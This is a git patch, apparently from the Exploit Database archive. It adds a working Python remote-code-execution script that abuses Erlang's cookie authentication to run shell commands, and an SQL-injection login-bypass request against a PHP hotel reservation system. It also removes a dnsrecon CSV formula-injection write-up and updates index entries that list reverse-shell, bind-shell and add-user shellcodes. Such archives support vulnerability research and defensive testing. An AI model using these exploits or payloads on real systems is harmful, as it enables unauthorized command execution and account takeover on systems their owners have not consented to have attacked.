From f8d41df29fd87ec1dd7965edca73f90edd1b6aea Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 14 Jan 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-01-14 4 changes to exploits/shellcodes dnsrecon 0.10.0 - CSV Injection Erlang Cookie - Remote Code Execution Online Hotel Reservation System 1.0 - Admin Authentication Bypass Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes) --- exploits/multiple/remote/49418.py | 67 +++++++++++++++++++++++++++++++ exploits/php/webapps/49420.txt | 16 ++++++++ exploits/python/local/49394.txt | 37 ----------------- files_exploits.csv | 3 +- files_shellcodes.csv | 6 +-- 5 files changed, 88 insertions(+), 41 deletions(-) create mode 100755 exploits/multiple/remote/49418.py create mode 100644 exploits/php/webapps/49420.txt delete mode 100644 exploits/python/local/49394.txt diff --git a/exploits/multiple/remote/49418.py b/exploits/multiple/remote/49418.py new file mode 100755 index 000000000..fda202054 --- /dev/null +++ b/exploits/multiple/remote/49418.py @@ -0,0 +1,67 @@ +# Exploit Title: Erlang Cookie - Remote Code Execution +# Date: 2020-05-04 +# Exploit Author: 1F98D +# Original Author: Milton Valencia (wetw0rk) +# Software Link: https://www.erlang.org/ +# Version: N/A +# Tested on: Debian 9.11 (x64) +# References: +# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ +# +# Erlang allows distributed Erlang instances to connect and remotely execute commands. +# Nodes are permitted to connect to eachother if they share an authentication cookie, +# this cookie is commonly called ".erlang.cookie" +# +#!/usr/local/bin/python3 +​ +import socket +from hashlib import md5 +import struct +import sys +​ +TARGET = "192.168.1.1" +PORT = 25672 +COOKIE = "XXXXXXXXXXXXXXXXXXXX" +CMD = "whoami" +​ +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((TARGET, PORT)) +​ +name_msg = b"\x00" +name_msg += b"\x15" +name_msg += b"n" +name_msg += b"\x00\x07" +name_msg += b"\x00\x03\x49\x9c" +name_msg += b"AAAAAA@AAAAAAA" +​ +s.send(name_msg) +s.recv(5) # Receive "ok" message +challenge = s.recv(1024) # Receive "challenge" message +challenge = struct.unpack(">I", challenge[9:13])[0] +​ +print("Extracted challenge: {}".format(challenge)) +​ +challenge_reply = b"\x00\x15" +challenge_reply += b"r" +challenge_reply += b"\x01\x02\x03\x04" +challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() +​ +s.send(challenge_reply) +challenge_res = s.recv(1024) +if len(challenge_res) == 0: + print("Authentication failed, exiting") + sys.exit(1) +​ +print("Authentication successful") +​ +ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" +msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' +msg += struct.pack(">H", len(CMD)) +msg += bytes(CMD, 'ascii') +msg += b'jw\x04user' +​ +payload = b'\x70' + ctrl + msg +payload = struct.pack('!I', len(payload)) + payload +print("Sending cmd: '{}'".format(CMD)) +s.send(payload) +print(s.recv(1024)) \ No newline at end of file diff --git a/exploits/php/webapps/49420.txt b/exploits/php/webapps/49420.txt new file mode 100644 index 000000000..f9ee4c93b --- /dev/null +++ b/exploits/php/webapps/49420.txt @@ -0,0 +1,16 @@ +# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass +# Exploit Author: Richard Jones +# Date: 2021-01-13 +# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html +# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +#Exploit URL: http://TARGET/marimar/admin/index.php + Host: TARGET + POST /marimar/admin/login.php HTTP/1.1 + Content-Length: 57 + Connection: close + Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616 + + email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin= \ No newline at end of file diff --git a/exploits/python/local/49394.txt b/exploits/python/local/49394.txt deleted file mode 100644 index 668c5999c..000000000 --- a/exploits/python/local/49394.txt +++ /dev/null @@ -1,37 +0,0 @@ -# Exploit Title: dnsrecon 0.10.0 - CSV Injection -# Author: Dolev Farhi -# Date: 2021-01-07 -# Vendor Homepage: https://github.com/darkoperator/dnsrecon/ -# Version : 0.10.0 -# Tested on: ParrotOS 4.10 - -dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String. -A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: - -_spf.example.com "test',=1+1337,'z" - - -user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8 -[*] Performing General Enumeration of Domain: _spf.example.com -[-] DNSSEC is not configured for _spf.example.com -[*] SOA ns-59.awsdns-07.com 205.1.1.1 -[-] Could not Resolve NS Records for _spf.example.com -[-] Could not Resolve MX Records for _spf.example.com -[*] TXT _spf.example.com test',=1+1337,'z -[*] Enumerating SRV Records -[+] 0 Records Found -[*] Saving records to CSV file: ./file.csv -{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'} -{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"} - - -This output will then be rewritten into a CSV with this structure: - -Type,Name,Address,Target,Port,String -SOA,ns-59.awsdns-07.com,205.1.1.1 -TXT,_spf.example.com,,,,'test',=1+1337,'z' - -The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464: - -Attribute Values - All printable ASCII characters are permitted in the attribute value. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2a040b565..614cf7ef4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11243,7 +11243,6 @@ id,file,description,date,author,type,platform,port 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows, 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows, 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java, -49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python, 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 @@ -18355,6 +18354,7 @@ id,file,description,date,author,type,platform,port 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows, 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows, 49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris, +49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43619,3 +43619,4 @@ id,file,description,date,author,type,platform,port 49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php, 49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php, 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple, +49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index b7887098d..2e25c10fe 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1005,10 +1005,10 @@ id,file,description,date,author,type,platform 47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86 47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 -47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86 47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86 -47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 +47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86 47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows @@ -1025,4 +1025,4 @@ id,file,description,date,author,type,platform 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86 -49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux +49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux